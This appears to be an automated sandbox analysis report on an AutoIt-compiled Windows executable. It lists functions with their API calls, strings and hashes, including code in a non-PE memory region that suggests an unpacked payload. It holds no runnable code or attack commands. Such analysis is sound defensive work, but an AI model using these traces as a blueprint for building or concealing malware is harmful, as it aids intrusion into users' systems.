Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 7692c4378464b0da73273d14596bd70f1b142e92881fcc8f064ad8a21e5c46bd
Instruction ID: 10cbe676721459d87373047ac4f01b39cd8d2ee8f05fed6a589c912b5bc8c416
Opcode Fuzzy Hash: 7692c4378464b0da73273d14596bd70f1b142e92881fcc8f064ad8a21e5c46bd
Instruction Fuzzy Hash: A291C67154A7C4DECB31CB6885956AAFFF5AF26300B488D5DD0CB93B01D328E908D769

Function 007A4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0077E7C1), ref: 007A46A6
FindFirstFileW.KERNELBASE(?,?), ref: 007A46B7
FindClose.KERNEL32(00000000), ref: 007A46C7

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 826ef002c82c3186c61a5773c36f3134571f1e65e99faa18eb6f62bb40c9b456
Instruction ID: f674ef6779db58b5a22e050b4bc9135988719a27f62537e112c555cac30f325c
Opcode Fuzzy Hash: 826ef002c82c3186c61a5773c36f3134571f1e65e99faa18eb6f62bb40c9b456
Instruction Fuzzy Hash: 22E0DF328118006B8610A738EC4D8EE779DAE87335F10472AF835C20E0EBF89960869A

Function 0074E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 0078428C

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: d8a9b1f8caf3c45a079d77954bc347254320c7a1b932f3b31e31f01803edadc9
Instruction ID: 7469734d9d32ad52d56f014ded4ad606308c72f3a8163e17b294c749cd978ee0
Opcode Fuzzy Hash: d8a9b1f8caf3c45a079d77954bc347254320c7a1b932f3b31e31f01803edadc9
Instruction Fuzzy Hash: 8DA29F74E04216CFCB24DF58C484AAEB7B1FF58320F248169E916AB351D779ED82CB91

Function 00750B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00750BBB
timeGetTime.WINMM ref: 00750E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00750FB3
TranslateMessage.USER32(?), ref: 00750FC7
DispatchMessageW.USER32(?), ref: 00750FD5
Sleep.KERNEL32(0000000A), ref: 00750FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 0075105A
DestroyWindow.USER32 ref: 00751066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00751080
Sleep.KERNEL32(0000000A,?,?), ref: 007852AD
TranslateMessage.USER32(?), ref: 0078608A
DispatchMessageW.USER32(?), ref: 00786098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007860AC

Strings

@GUI_CTRLID, xrefs: 00785364
@COM_EVENTOBJ, xrefs: 0078591A
@GUI_CTRLHANDLE, xrefs: 0078540E
@GUI_WINHANDLE, xrefs: 007853B9
@TRAY_ID, xrefs: 00785BB9

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 5ffb83526ba4c04c519206f5d8d631215bfe1659abc3b6119272ec7ba1eac36f
Instruction ID: cad893d6c8fc1e59ce021e52824f0c57b9cac84dcd2cd42d9cbe85846e4832de
Opcode Fuzzy Hash: 5ffb83526ba4c04c519206f5d8d631215bfe1659abc3b6119272ec7ba1eac36f
Instruction Fuzzy Hash: 77B2E770608741DFD724EF24C889BAAB7E5FF84304F14891DF98997291DB79E848CB92

Function 007A93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007A91E9: __time64.LIBCMT ref: 007A91F3

Part of subcall function 00745045: _fseek.LIBCMT ref: 0074505D

__wsplitpath.LIBCMT ref: 007A94BE

Part of subcall function 0076432E: __wsplitpath_helper.LIBCMT ref: 0076436E

_wcscpy.LIBCMT ref: 007A94D1
_wcscat.LIBCMT ref: 007A94E4
__wsplitpath.LIBCMT ref: 007A9509
_wcscat.LIBCMT ref: 007A951F
_wcscat.LIBCMT ref: 007A9532

Part of subcall function 007A922F: _memmove.LIBCMT ref: 007A9268
Part of subcall function 007A922F: _memmove.LIBCMT ref: 007A9277

_wcscmp.LIBCMT ref: 007A9479

Part of subcall function 007A99BE: _wcscmp.LIBCMT ref: 007A9AAE
Part of subcall function 007A99BE: _wcscmp.LIBCMT ref: 007A9AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007A96DC
_wcsncpy.LIBCMT ref: 007A974F
DeleteFileW.KERNEL32(?,?), ref: 007A9785
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007A979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A97AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A97BE

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: d8282636f698cf0f0b944991277a2a50e22ec828fe8eb820a99511ae3cb13238
Instruction ID: 3760712d934381beccdf1a82930bb58255e7ad8761d5e00b161f3682e3ccd538
Opcode Fuzzy Hash: d8282636f698cf0f0b944991277a2a50e22ec828fe8eb820a99511ae3cb13238
Instruction Fuzzy Hash: 34C13CB1E00229ABCF21DFA5CC85EDEB7BDAF85300F0041AAF609E7151DB349A548F65

Function 00743015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 74
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00743074
RegisterClassExW.USER32(00000030), ref: 0074309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007430AF
InitCommonControlsEx.COMCTL32(?), ref: 007430CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007430DC
LoadIconW.USER32(000000A9), ref: 007430F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00743101

Strings

TaskbarCreated, xrefs: 007430A4
+, xrefs: 0074305D
AutoIt v3 GUI, xrefs: 00743090
0, xrefs: 00743056

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: e47f74b6de13e62510e318e4e62e55b8985d7797952bb7c0f114eb1840e8c7ae
Instruction ID: 1beaa942d6e390566e02168e2e5c0b790b1e2e92c152b23420711b31abce1c3f
Opcode Fuzzy Hash: e47f74b6de13e62510e318e4e62e55b8985d7797952bb7c0f114eb1840e8c7ae
Instruction Fuzzy Hash: A4313AB1940305EFDB90DFA4DC48AC9BBF1FB09710F14852EE595E62A0E3B945A1CF94

Function 00743041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00743074
RegisterClassExW.USER32(00000030), ref: 0074309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007430AF
InitCommonControlsEx.COMCTL32(?), ref: 007430CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007430DC
LoadIconW.USER32(000000A9), ref: 007430F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00743101

Strings

TaskbarCreated, xrefs: 007430A4
+, xrefs: 0074305D
AutoIt v3 GUI, xrefs: 00743090
0, xrefs: 00743056

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 96e1e643aa9e6ae9ef7b71873f9f87a0c86174ff424079e5307076b81d739fba
Instruction ID: 5c7c1010c55d7dafea66e2635c728a47ff93acfa15e8ec9573738d5b64115926
Opcode Fuzzy Hash: 96e1e643aa9e6ae9ef7b71873f9f87a0c86174ff424079e5307076b81d739fba
Instruction Fuzzy Hash: 3321C5B1901218AFDB40DFA4EC49B9DBBF5FB08710F00812AF911A62A0E7B545648F95

Function 007471EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00744864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008062F8,?,007437C0,?), ref: 00744882

Part of subcall function 0076074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007472C5), ref: 00760771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00747308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0077ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0077ED32
RegCloseKey.ADVAPI32(?), ref: 0077ED70
_wcscat.LIBCMT ref: 0077EDC9

Strings

\, xrefs: 0077EDEC
\Include\, xrefs: 007472C5
Include, xrefs: 0077ECE8, 0077ED29
Software\AutoIt v3\AutoIt, xrefs: 007472FE

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: b19b49079832bd388b62f0da291e30c074080ae3fbb77272c6d6fecde6e89292
Instruction ID: 601acce1e08bd66fb9229e4009eafc918a67e0134dcb6b4617f12f8dbfb17e2e
Opcode Fuzzy Hash: b19b49079832bd388b62f0da291e30c074080ae3fbb77272c6d6fecde6e89292
Instruction Fuzzy Hash: 8B719E71909301DEC754EF25DC8999BBBE8FF58740F80492EF44AC31A1EB74A949CBA1

Function 00743633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 007436D2
KillTimer.USER32(?,00000001), ref: 007436FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0074371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0074372A
CreatePopupMenu.USER32 ref: 0074373E
PostQuitMessage.USER32(00000000), ref: 0074375F

Strings

%}, xrefs: 0077D2D1, 0077D31F
TaskbarCreated, xrefs: 00743725

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%}
API String ID: 129472671-1720201399
Opcode ID: 561bd638921a263494221b79defa82214786d0743d70c3e4e0d6cc0b34e1d754
Instruction ID: 31b827dc88978adccff11bdd360be09fee2cb5b59b5ae15a0d589d7f49279d52
Opcode Fuzzy Hash: 561bd638921a263494221b79defa82214786d0743d70c3e4e0d6cc0b34e1d754
Instruction Fuzzy Hash: D04136B1200106FBDF645F68DC4DB793765FB00340F144129FA0ED62A2EB6CAE349766

Function 00743A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00743A62
LoadCursorW.USER32(00000000,00007F00), ref: 00743A71
LoadIconW.USER32(00000063), ref: 00743A88
LoadIconW.USER32(000000A4), ref: 00743A9A
LoadIconW.USER32(000000A2), ref: 00743AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00743AD2
RegisterClassExW.USER32(?), ref: 00743B28

Part of subcall function 00743041: GetSysColorBrush.USER32(0000000F), ref: 00743074
Part of subcall function 00743041: RegisterClassExW.USER32(00000030), ref: 0074309E
Part of subcall function 00743041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007430AF
Part of subcall function 00743041: InitCommonControlsEx.COMCTL32(?), ref: 007430CC
Part of subcall function 00743041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007430DC
Part of subcall function 00743041: LoadIconW.USER32(000000A9), ref: 007430F2
Part of subcall function 00743041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00743101

Strings

AutoIt v3, xrefs: 00743B17
#, xrefs: 00743B0D
0, xrefs: 00743B06

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 76bfb3ca89d2e20e818ec84819450566bd4906cbcbda164a16854010f5861eaa
Instruction ID: 15a2d722f1cbf5a425a7f7380d5154ca8614a76051f1ecaaee1e98688dc4a249
Opcode Fuzzy Hash: 76bfb3ca89d2e20e818ec84819450566bd4906cbcbda164a16854010f5861eaa
Instruction Fuzzy Hash: 9821F971A40304EFEB509FA4EC49F9D7BB6FB08721F10412AE504A62A0E7BA56649F94

Function 00743778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteScript, xrefs: 007438CE
CMDLINE, xrefs: 00743834
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007437C0
/ErrorStdOut, xrefs: 0074388F
CMDLINERAW, xrefs: 0074380D
/AutoIt3ExecuteLine, xrefs: 007438B9
/AutoIt3OutputDebug, xrefs: 007438A4

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 9f0e3886b5d1914dd79e1b1deb65870e440b1dce3e6648339214afcc12409394
Instruction ID: a5ae9d1b227cbf102a272d0c1290a17e676fe5c155b12f04804916f4863cb698
Opcode Fuzzy Hash: 9f0e3886b5d1914dd79e1b1deb65870e440b1dce3e6648339214afcc12409394
Instruction Fuzzy Hash: DEA13E7191022DDADF14EBA0CC9AEEEB778BF15300F444529F516B7192EF786A09CB60

Function 02392600 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 023926D1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 023928F7

Memory Dump Source

Source File: 00000000.00000002.1695075216.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2390000_b3u71vBG0u.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction ID: cb549ff101c2991e61cbc71ad3850e576561a137e699b29dbfbb60f828606fb2
Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction Fuzzy Hash: 53A1F374E04209EBDF14CFA4C894BEEBBB5BF49304F208559E901BB281D7759A80CF94

Function 007439E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00743A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00743A36
ShowWindow.USER32(00000000,?,?), ref: 00743A4A
ShowWindow.USER32(00000000,?,?), ref: 00743A53

Strings

edit, xrefs: 00743A30
AutoIt v3, xrefs: 00743A0D, 00743A12, 00743A13

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 671db9091fe40f80a6f76264d86fd00802033463daadcce9df561b646fa463a4
Instruction ID: a8f6d3aa8156f1501e2d43de9f060f35741253f00ebf5d5ad3c444144431c9b5
Opcode Fuzzy Hash: 671db9091fe40f80a6f76264d86fd00802033463daadcce9df561b646fa463a4
Instruction Fuzzy Hash: DEF0DA71641290BFEA7117276C4DF672E7EE7C6F60B00412EF904A2170D6B91871DAB4

Function 023923B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 023922A0: Sleep.KERNELBASE(000001F4), ref: 023922B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 023924F7

Strings

MV00LG4OEICT513EWCVNY9SFZ0F16J, xrefs: 0239255A, 0239255D

Memory Dump Source

Source File: 00000000.00000002.1695075216.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2390000_b3u71vBG0u.jbxd

Similarity

API ID: CreateFileSleep
String ID: MV00LG4OEICT513EWCVNY9SFZ0F16J
API String ID: 2694422964-1512823477
Opcode ID: 118880941effc9ed61fb06dc03d83a575e0c9056eeceebb0f458fc09cbca8d5e
Instruction ID: 2afb60844e021ab0f9e5d56b10696bffba0af0ef453cfa74860ab0f7b3f0669c
Opcode Fuzzy Hash: 118880941effc9ed61fb06dc03d83a575e0c9056eeceebb0f458fc09cbca8d5e
Instruction Fuzzy Hash: FF616270D14288EAEF11D7A4C858BDFBBB99F15304F044199E6487B2C1D7BA0B49CBA5

Function 0074410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0077D5EC

Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66

_memset.LIBCMT ref: 0074418D
_wcscpy.LIBCMT ref: 007441E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007441F1

Strings

Line: , xrefs: 0077D615

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
